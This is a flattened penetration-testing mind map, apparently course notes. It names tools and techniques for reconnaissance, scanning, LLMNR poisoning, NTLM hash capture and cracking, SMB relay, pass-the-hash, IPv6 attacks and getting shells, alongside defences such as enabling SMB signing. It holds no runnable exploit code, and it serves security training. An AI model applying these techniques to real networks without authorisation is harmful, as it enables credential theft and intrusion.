Professional Documents
Culture Documents
Penetration Testing: Scanning & Enumeration
Penetration Testing: Scanning & Enumeration
Penetration Testing: Scanning & Enumeration
Netdiscover
arp-scan
Scanning
Masscan
Metasploit
Nessus
Nikto
Dirbuster
Dirb
Gobuster HTTP/HTTPS
Source Code
Burp Suite
Test Server upload Davtest
Msfconsole - smb_version
Scanning &
Enumeration
smbclient SMB Enumeration LLMNR
enum4linux (not working properly) Responder NBT-NS
Connection attempt SSH DNS/MDNS
LLMNR Poisoning
anonymous access Disable LLMNR and NBT-NS
FTP
binary Defences Require Network Access Control
ipconfig /all Require Strong User Passwords
arp -a Capturing NTLMv2 Hashes Responder
Network
route print Password Cracking (Hashcat)
netstat -ano Host Discovery Nessus
Google SMB Signing Disabled Nmap script
Searchsploit HTTP Off
Vulnerability Research Responder
Exploit Database SMB Off
Metasploit - search Crack offline
SAM Hashes Dump
Pass-the-Hash
WHOIS Interactive shell -i Netcat
nslookup Target Validation ntlmrelayx Powershell
dnsrecon Command execute -c Reverse shell msf web_delivery
Google Fu SMB Relay Attacks other
dig Execute .exe file -e msfvenom meterpreter
Nmap It will completely stop the attack
Finding Subdomains Enable SMB signing on all devices
Sublist3r Performance issues with file copy
Bluto Stops the attack
Defences Disable NTLM Authentication
crt.sh If Kerberos stops working, back to NTLM
Nmap Overview Admin only logging into their accounts / servers / domain controllers
Account tiering
Wappalyzer Local Admin restriction No local Admin prevent lateral movement
WhatWeb Fingerprinting exploit/windows/smb/psexec
msfconsole
BuiltWith exploit/windows/smb/psexec_psh
Netcat Gain Shell Access psexec.py AV noisy
HaveIbeenPwned smbexec.py Less noisy / Half-shell
Breach-Parse wmiexec.py Less noisy / Half-shell
WeLeakInfo Data Breaches aclpwn restore
mitm6
scylla.sh new user creation on DC
Reconaissance LDAP Relay
leakedsource.ru info dump (loot folder)
ntlmrelayx
Hunter.io (Domain Search) Email Address Gathering delegate access
IPv6 Attacks
bugcrowd.com Identify Target Disable IPv6 Possible unwanted side effects Define Block Rules / instead of Allow Rules
Breach-Parse Disable wpad if not in use
Defenses
email:*bbc.co.uk Breached Credentials Enable LDAP signing and channel binding usually not enabled
scylla.sh
email:username* Put admin users into the protected users group prevent impersonation or delegation
The Harvester OSINT Get loot back
Sublist3r Get account created on Domain Controller Easy win
mitm6
crt.sh Early morning
Subdomains
OWASP Amass Lunch time
Tomnomnom HTTPprobe Are they giving us hashes ?
BuiltWith Initial Attack Vectors Are those hashes easy to crack ?
Identify Website
Wappalizer See how the network responds Easy win
Technologies
whatweb might have had Pentest before
Responder If LMNR is disabled
Information Gathering with Burp Suite might know common attacks
Google Fu Looking for hashes
LinkedIn Early morning
Social Media
Twitter Lunch time
Nessus scan
Mutual Non-Disclosure Agreement (NDA) Nmap scan
Performance Objectives Morning Pickup targets / hashes for SMB Relay attacks
Other Attack Vectors and Strategies Day begins with Look for SMB open / signing disbled
Outline the Responsabilities Master Service Agreement (MSA) Afternoon Relay hashes
https://www.rapid7.com/legal/msa/ Rapid7 MSA example Loot at logins Check for default creds